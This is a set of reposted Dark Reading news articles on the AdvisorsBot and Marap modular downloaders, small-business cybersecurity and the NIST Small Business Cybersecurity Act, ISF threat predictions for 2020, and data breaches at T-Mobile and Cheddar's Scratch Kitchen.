STE WILLIAMS

Two recent malware discoveries suggest that attackers are turning to new modular downloaders that allow them to modify and update their software at will after it has been installed on a victim’s system.

Security vendor Proofpoint says its researchers have observed a previously undocumented downloader, called Advisorsbot, being used in a malicious email campaign targeting workers in the restaurant, hotel, and telecommunications industries since at least May 2018.

The malware is designed in such a way that attackers can add new payloads and capabilities to it post-infection. For the moment, at least, all that AdvisorsBot is doing is loading a fingerprinting module on infected systems presumably so it can identify systems of interest.

The data being collected and sent back to the malware’s command-and-control server includes system ID, operating system version, domain-related information, Microsoft Outlook account details, information on any antimalware tools on the system, and some unknown hard-coded values. AdvisorsBot currently can receive and execute only two commands — one to load a module and the other to load shellcode in a threat, Proofpoint says.

The malware is identical in function to another modular downloader named Marap, which researchers at Proofpoint also recently discovered. It is being used in a relatively large email campaign targeting users in the financial sector.

Like AdvisorsBot, Marap is designed to let attackers update their malware at will after it has been installed on a victim’s system, but it, too, currently only has a system fingerprinting module.

Growing use of such malware could pose new problems for enterprises.

“Modular downloaders tend to be small and ‘quiet’ in contrast, for example, to ransomware that lets victims know quite clearly that they are infected,” says Sherrod DeGrippo, director of threat research and detection at Proofpoint. “For the enterprise, having stealthy malware installed on clients and servers capable of carrying out a variety of malicious actions in the future presents significant risks to organizations and real benefits to threat actors.”  

Both AdvisorsBot and Marap employ features aimed at making it harder for security researchers to analyze the malware. For example, AdvisorsBot contains a lot of extra loops, statements, instructions, and other junk code designed to slow down reverse-engineering, according to Proofpoint. It also includes features for detecting anti-malware tools and for when it might be running in a sandbox so it can exit without executing.

The threat actor behind the campaign — an entity that Proofpoint identifies as TA555 — has been distributing AdvisorsBot via phishing emails containing a macro that initially executed a PowerShell command to download the malware. Since early August, the attacker has been using a macro to run a PowerShell command, which then downloads a PowerShell script capable of running AdvisorsBot without writing it to disk first, Proofpoint said.

Interestingly, since first releasing the malware in May, its authors have completely rewritten it in PowerShell and .NET. Proofpoint has dubbed the new variant as PoshAdvisor and describes it as not identical to AdvisorsBot but containing many of the same functions, including the ability to download additional modules.

“At this time, it is unclear why the author might have rewritten the malware in PowerShell,” DeGrippo says. It is certainly unusual for malware authors to do so and may be an attempt to further evade defenses.

“For the enterprise, more variety in the threat landscape and newly coded malware increase complexity for defenders and should be driving investments in threat intelligence, robust layered defenses, and end user education,” she says.

Related Content:

• Marap Malware Appears, Targeting Financial Sector
• How Hackers Hide Their Malware: Advanced Obfuscation
• Turla Threat Group Uses Email PDF Attachments to Control Stealthy Backdoor
• 10 Threats Lurking on the Dark Web

Learn from the industry’s most knowledgeable CISOs and IT security experts in a setting that is conducive to interaction and conversation. Early bird rate ends August 31. Click for more info. 

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year … View Full Bio

Article source: https://www.darkreading.com/vulnerabilities---threats/modular-downloaders-could-pose-new-threat-for-enterprises/d/d-id/1332658?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Even with increased public awareness of cybersecurity threats, small- to midsized businesses (SMBs) mostly remain behind the curve: some 51% of SMB leaders are convinced their companies are not a target for cybercrime.

Meanwhile, 76% of them say they haven’t activated multifactor authentication (MFA) for their enterprise email accounts, according to a new report released today from Switchfast Technologies. 

“Frankly, we see similar numbers for MDM [mobile device management]” MFA adoption as well, says Nik Vargas, CTO for Switchfast. He says a single breach can cost a small business up to $130,000, mostly for legal work, cyber remediation, and reputational damage.

Meanwhile, the federal government is giving SMBs an assist: President Trump signed the NIST Small Business Cybersecurity Act last week, which directs NIST to develop a streamlined version of its famed Cybersecurity Framework.

“The fact that the federal government has made this a focus is a positive step,” Vargas says. “Of course, one of the real dangers is that small businesses can be a launching pad for much larger attacks on government sites and the large commercial giants.”

The reality of SMB security challenges for some time has been painfully obvious: a Ponemon Institute report in 2016 that found that roughly half of the nation’s 30 million small businesses had been breached. And the new Switchfast report demonstrates that there’s still plenty of work to do to get SMBs up to speed in securing their systems.

Daniel Eliot, director of small business education at the National Cyber Security Alliance, looks for NIST to offer a simplified version of its framework, plus some tools he can use in the NCSA’s small business workshops.

“The idea is to make security approachable to small businesspeople, not to use scare tactics,” Eliot says. “I’m glad Congress recognizes the unique need of small businesses, that they typically lack the bodies or budget to do cybersecurity well.”

NIST’s Cybersecurity Framework provides a way for organizations to assess their security risk, and provides guidelines for  protecting, detecting and responding to cyber threats. 

Kevin Stine, chief of the applied cybersecurity division in NIST’s Information Technology Lab, says NIST’s work on SMB security will come from existing agency funding.

“I don’t envision grants being made available to small businesses and there won’t be a list of preferred products; that’s not what NIST does,” Stine explains. “NIST has supported small businesses since the early 2000s, so I think we can hit the ground running. Our support may not always be with documents; it may also come in the form of video clips and info graphics that will be useful to small businesses.”

Bill Conner, CEO of SonicWall, says it’s good news to get the feds’ support for SMBs. “The government finally understands the importance of SMBs and plans to put some resources to better understand the risk factor, that SMBs really are not prepared,” Conner says.  

Switchfast’s Vargas says his company’s focus on small businesses started with the first ransomware cases in 2013. In the past, SMB owners could pass off viruses as minor annoyances (think pop-ups) that caused computers to slow down, he says. But once ransomware hit, it became clear that companies could lose money or data – and SMBs were targets, too.

“Small business leaders have to become security champions and communicate it to the staff,” he says. “They have to explain to employees that security it not just about protecting the boss’s Mercedes Benz. They have to understand that their W2s or tax refunds can be stolen, so cybercrime affects them, too.”

Related Content:

• 9 SMB Security Trends
• A Sneak Peek at the New NIST Cybersecurity Framework
• 5 Ways Small Security Teams Can Defend Like Fortune 500 Companies
• 6 Reasons Security Awareness Programs Go Wrong

Learn from the industry’s most knowledgeable CISOs and IT security experts in a setting that is conducive to interaction and conversation. Early bird rate ends August 31. Click for more info. 

Steve Zurier has more than 30 years of journalism and publishing experience, most of the last 24 of which were spent covering networking and security technology. Steve is based in Columbia, Md. View Full Bio

Article source: https://www.darkreading.com/application-security/half-of-small-businesses-believe-theyre-not-cybercrime-targets/d/d-id/1332656?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Over the coming years, the foundations of today’s digital world will shake — violently. Innovative and determined attackers, along with big changes to the way organizations conduct their operations, will combine to threaten even the strongest establishments.

At the Information Security Forum, we recently released “Threat Horizon 2020,” the latest in an annual series of reports that provide businesses a forward-looking view of the increasing threats in today’s always-on, interconnected world. In this report, we highlight the top threats to information security emerging over the next two years, as determined by our research.

Let’s take a look at a few of our predictions and what they mean for your organization.

Biometrics Offer a False Sense of Security
Biometric authentication technologies will flood into every part of an organization, driven by consumer demands for convenience and the promise of added security for corporate information. However, organizations will quickly realize that they are not as protected as they thought as this sense of security turns out to be unfounded. Attackers will learn to find increasingly sophisticated ways to overcome biometric safeguards.

Demands for convenience and usability will drive organizations to move to biometric authentication methods as the default for all forms of computing and communication devices, replacing today’s multifactor approach. However, any misplaced trust in the efficacy of one or more biometric methods will leave sensitive information exposed. Attacks on biometrics will affect finances and damage reputations.

Existing security policies will fall well short of addressing this issue as organizations — from the boardroom down — use new devices that depend on biometric technology. Failure to plan and prepare for this change will leave some organizations unwittingly using a single, vulnerable biometric factor to protect critical or sensitive information.

New Regulations Increase the Risk and Compliance Burden
By 2020, the number and complexity of new international and regional regulations to which organizations must adhere, combined with those already in place, will stretch compliance resources and mechanisms to breaking point. These new compliance demands will also result in an ever swelling “attack surface” that must be protected fully while attackers continually scan, probe, and seek to penetrate it.

For some organizations, the new compliance requirements will increase the amount of sensitive information — including customer details and business plans — that must be stockpiled and protected. Other organizations will see regulatory demands for data transparency resulting in information being made available to third parties that will transmit, process, and store it in multiple locations.

Balancing potentially conflicting demands while coping with the sheer volume of regulatory obligations, some companies may either divert essential staff away from critical risk mitigation activities or raise the impact of compliance failure to new levels. Business leaders will be faced with tough decisions. Those that make a wrong call may leave their organization facing extremely heavy fines and damaged reputations.

Trusted Professionals Divulge Organizational Weak Points
The relentless hunt for profits and never-ending changes in the workforce will create a constant atmosphere of uncertainty and insecurity that reduces loyalty to an organization. This lack of loyalty will be exploited: the temptations and significant rewards from leaking corporate secrets will be amplified by the growing market worth of those secrets, which include organizational weak points such as security vulnerabilities. Even trusted professionals will face temptation.

Most organizations recognize that passwords or keys to their mission-critical information assets are handed out sparingly and only to those that have both a need for them and are considered trustworthy. However, employees who pass initial vetting and background checks may now — or in the future — face any number of circumstances that entice them to break that trust: duress through coercion; being passed over for promotion; extortion or blackmail; offers of large amounts of money; or simply a change in personal circumstances.

While the insider threat has always been important, more than the organizational crown jewels are under threat. The establishment of bug bounty and ethical disclosure programs, together with a demand from cybercriminals and hackers, means the most secret of secrets (essential penetration test results and vulnerability reports, for example) are extremely valuable. Organizations that rely on existing mechanisms to ensure the trustworthiness of employees and contracted parties with access to sensitive information will find existing mechanisms inadequate.

Preparation Must Begin Now
To face mounting global threats, organizations must make methodical and extensive commitments to ensure that practical plans are in place to adapt to major changes in the near future. Employees at all levels of the organization will need to be involved, from board members to managers in nontechnical roles.

The themes listed above could affect businesses operating in cyberspace at breakneck speeds, particularly as the use of the Internet and connected devices spreads. Many organizations will struggle to cope as the pace of change intensifies. These threats should stay on the radar of every organization, both small and large, even if they seem distant. The future arrives suddenly, especially when you aren’t prepared.

Related Content:

• 6 Ways to Tell an Insider Has Gone Rogue
• Biometrics Are Coming So Are Security Concerns
• What CISOs Need To Know Before Adopting Biometrics
• The 6 Worst Insider Attacks of 2018 – So Far

Learn from the industry’s most knowledgeable CISOs and IT security experts in a setting that is conducive to interaction and conversation. Early-bird rate ends August 31. Click for more info. 

Steve Durbin is Managing Director of the Information Security Forum (ISF). His main areas of focus include the emerging security threat landscape, cybersecurity, BYOD, the cloud, and social media across both the corporate and personal environments. Previously, he was Senior … View Full Bio

Article source: https://www.darkreading.com/vulnerabilities---threats/insider-threats/a-false-sense-of-security-/a/d-id/1332636?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

On Aug. 20, hackers hit T-Mobile and, according to a statement from the company, gained access to personal information for some of its customers. While no financial data or Social Security numbers were exposed, information including names, billing ZIP codes, phone numbers, email addresses, account numbers, and account types were potentially compromised.

While the company has not released concrete numbers for the hack, it is estimated that approximately 2 million customers were affected.

The company, with approximately 77 million total users, has notified affected customers via text message.

Read here and here for more.

Learn from the industry’s most knowledgeable CISOs and IT security experts in a setting that is conducive to interaction and conversation. Early bird rate ends August 31. Click for more info. 

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/application-security/t-mobile-hit-with-customer-information-hack/d/d-id/1332661?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Another day, another restaurant chain data breach: this time was Cheddar’s Scratch Kitchen. The Darden Restaurants-owned food chain said it was alerted this month that its network had been hacked and customer payment card data exposed.

The cyberattack occurred sometime between Nov. 3, 2017 and Jan. 2, 2018. The culprits “were able to access and potentially obtain payment card information used to make purchases in certain Cheddar’s Scratch Kitchen restaurants” in some states, the company said in a breach notification notice on its website. The affected states are Alabama, Arizona, Arkansas, Delaware, Florida, Illinois, Indiana, Iowa, Kansas, Louisiana, Maryland, Michigan, Missouri, Nebraska, New Mexico, North Carolina, Ohio, Oklahoma, Pennsylvania, South Carolina, Texas, Virginia, and Wisconsin.

The exposed network is an older infrastructure that was replaced on April 10 of this year, the company said. “It’s important to note that there are no indications of unauthorized access to the current Cheddar’s Scratch Kitchen network and systems,” the company said.

Read more here.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/attacks-breaches/cheddars-scratch-kitchen-chain-suffers-data-breach/d/d-id/1332662?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple